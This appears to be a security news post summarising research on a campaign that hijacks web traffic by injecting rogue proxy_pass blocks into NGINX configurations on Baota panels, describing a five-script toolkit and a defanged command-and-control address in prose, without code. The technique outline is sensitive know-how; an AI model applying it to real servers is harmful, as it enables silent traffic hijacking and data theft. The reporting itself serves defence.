Your website traffic is being silently hijacked, and you might not even know it. A sophisticated campaign is targeting NGINX servers, redirecting unsuspecting users through malicious infrastructure without raising alarms. But here's where it gets controversial: this attack doesn't exploit a software vulnerability; instead, it cleverly hides in plain sight within NGINX's own configuration files, making it incredibly difficult to detect.
NGINX, a popular open-source tool for managing web traffic, acts as a middleman between users and servers, handling tasks like load balancing, caching, and reverse proxying. However, threat actors have found a way to abuse its core functionalities. Researchers at DataDog Security Labs uncovered this campaign, which primarily targets NGINX installations paired with Baota hosting panels, often used by websites with Asian top-level domains (.in, .id, .pe, .bd, .th) and government or educational institutions (.edu, .gov).
Here's how the attack works: Malicious actors inject rogue 'location' blocks into NGINX configuration files, intercepting specific URL paths. These blocks are then rewritten to include the original URL and redirect traffic using the 'proxy_pass' directive—a legitimate feature typically used for load balancing. By preserving request headers like 'Host,' 'X-Real-IP,' 'User-Agent,' and 'Referer,' the attackers ensure the redirected traffic appears completely normal, bypassing most security checks.
The attack employs a multi-stage toolkit, meticulously designed to avoid detection and ensure persistence:
- zx.sh: The initial script downloads and executes subsequent stages, even using raw HTTP requests if tools like curl or wget are unavailable.
- bt.sh: Targets Baota-managed NGINX configurations, dynamically selecting injection templates based on the server name and reloading NGINX to prevent downtime.
- 4zdh.sh: Scans common NGINX configuration directories, uses parsing tools to avoid corruption, detects prior injections, and validates changes before reloading.
- zdh.sh: Focuses on specific directories like /etc/nginx/sites-enabled, particularly targeting .in and .id domains, with fallback mechanisms for forced restarts.
- ok.sh: Maps hijacked domains, injection templates, and proxy targets, then exfiltrates this data to a command-and-control (C2) server at 158.94.210[.]227.
And this is the part most people miss: Since the attack doesn't exploit a vulnerability and users still reach their intended destinations, it often goes unnoticed unless specialized monitoring is in place. This raises a critical question: How can organizations protect themselves from such stealthy attacks?
As modern IT infrastructure evolves, manual workflows are struggling to keep up. The future demands intelligent, automated solutions that can detect and respond to threats in real time. For instance, tools that continuously monitor configuration changes and flag anomalies could be key to identifying such attacks early. But is automation enough, or do we need a fundamental shift in how we approach security?
What’s your take? Do you think traditional security measures are sufficient, or is it time to rethink our strategies entirely? Let us know in the comments below!
